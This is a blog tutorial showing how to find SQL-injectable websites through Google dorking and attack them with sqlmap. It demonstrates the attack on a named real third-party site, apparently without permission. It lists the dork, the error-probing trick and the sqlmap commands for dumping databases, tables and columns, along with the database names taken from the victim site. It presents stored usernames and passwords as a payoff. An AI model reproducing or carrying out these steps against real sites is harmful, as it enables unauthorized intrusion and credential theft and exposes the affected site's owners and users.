DEV Community

Hafiz Muhammad Attaullah
Hafiz Muhammad Attaullah

Posted on

Exploit Website Databases Using SQLmap

🎩 Exploit Website Databases Using SQLmap 🎩

✨SQLmap is one of the most famous tools for SQL injection. It is pre-installed in Kali Linux so no need to download it from anywhere.

What is a SQL injection attack❓

✨SQLi is a common attack where the attacker injects and executes malicious SQL requests in order to get hold of the web databases. These attacks are common in vulnerable websites that use SQL RDBMS to store databases

So today we'll perform an SQLi attack on a vulnerable website

✅ Requirements

⭕️Kali

⭕️Knowledge on Google Dorking

✅ Steps

⭕️ Google Dork vulnerable websites

First of all we have to get a vulnerable website to perform the attack. So we'll use Google Dorking. In simple words, it means that using Google search engine, we can use some special codes in order to get some security holes in websites. Here I'm gonna use this Dork to get SQLi vulnerable websites

inurl:index.php?id=

This will have many results. I've chosen the following website

http://www.asfaa.org/members.php?id=1

⭕️ Get the vulnerability of the website

To get the vulnerability, I'll use the following trick

Add 1 with Asterix * and reload the website

http://www.asfaa.org/members.php?id=1*

When the website shows error, it means that it's vulnerable

⭕️ Fire up Sqlmap 🔥

Open terminal. Then type there

sqlmap -u yoururl

⚠️Make sure to replace the Asterix with the original value and give the full URL

In my case, I typed

sqlmap -u http://www.asfaa.org/members.php?id=1

It'll start injecting malicious SQL requests. Once done, you'll notice the changes

⭕️ Exploit databases

Now we need to type the next command

sqlmap -u yoururl --dbs

When I did it in my case, I received the following databases

information_schema
db83231_acolop
db83231_asfaa

⭕️ Extract the tables and columns

Now, you can extract the tables of any of the databases using the command

sqlmap -u yoururl -D databasename --tables

For columns,

sqlmap -u yoururl -D databasename -T tablename --columns

I did the following

sqlmap -u http://www.asfaa.org/members.php?id=1 -D db83231_asfaa --tables

sqlmap -u http://www.asfaa.org/members.php?id=1 -D db83231_asfaa -T members --columns

And I got lots of results ❗️

ℹ️ One main advantage of SQLi is that some websites store usernames and passwords in SQL databases that can be exploited.

Hafiz Muhammad Attaullah

Top comments (0)